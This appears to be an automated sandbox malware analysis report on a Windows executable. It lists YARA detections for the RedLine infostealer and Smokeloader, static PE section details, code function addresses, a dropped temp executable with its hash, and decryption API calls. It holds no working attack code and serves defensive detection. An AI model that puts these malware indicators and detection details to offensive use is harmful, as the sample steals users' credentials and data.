Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: IoUNtL.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Detected potential crypto function

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00408C60	0_2_00408C60
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040DC11	0_2_0040DC11
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00407C3F	0_2_00407C3F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00418CCC	0_2_00418CCC
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00406CA0	0_2_00406CA0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004028B0	0_2_004028B0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041A4BE	0_2_0041A4BE
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00418244	0_2_00418244
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00401650	0_2_00401650
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00402F20	0_2_00402F20
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004193C4	0_2_004193C4
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00418788	0_2_00418788
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00402F89	0_2_00402F89
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00402B90	0_2_00402B90
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004073A0	0_2_004073A0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00617856	0_2_00617856
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006118A0	0_2_006118A0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00613170	0_2_00613170
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006131D9	0_2_006131D9
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006289D8	0_2_006289D8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00612B00	0_2_00612B00
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00628494	0_2_00628494
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00612DE0	0_2_00612DE0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061DE61	0_2_0061DE61
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00616EF0	0_2_00616EF0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00618EB0	0_2_00618EB0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00617E8F	0_2_00617E8F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062A70E	0_2_0062A70E
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00628F1C	0_2_00628F1C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006177C2	0_2_006177C2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D1ED2	0_2_021D1ED2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D1EE0	0_2_021D1EE0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDC559	0_2_05FDC559
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDA1E0	0_2_05FDA1E0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDE230	0_2_05FDE230
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDDCB7	0_2_05FDDCB7
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDE562	0_2_05FDE562
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FD94A8	0_2_05FD94A8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDF390	0_2_05FDF390
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06063478	0_2_06063478
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0606F2E0	0_2_0606F2E0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0606FA30	0_2_0606FA30
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06067920	0_2_06067920
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A1A68	0_2_060A1A68
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A7F80	0_2_060A7F80
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A2A09	0_2_060A2A09
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A2A18	0_2_060A2A18
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060DC54C	0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060D90C8	0_2_060D90C8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060D7D87	0_2_060D7D87
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060DC54C	0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060DC54C	0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06102228	0_2_06102228
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F46076	1_2_00F46076
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F46D00	1_2_00F46D00

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\IoUNtL.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: String function: 0061E428 appears 44 times
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: String function: 0040E1D8 appears 44 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556

PE file contains executable resources (Code or Archives)

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: MyProg.exe.1.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: IoUNtL.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: IoUNtL.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: IoUNtL.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
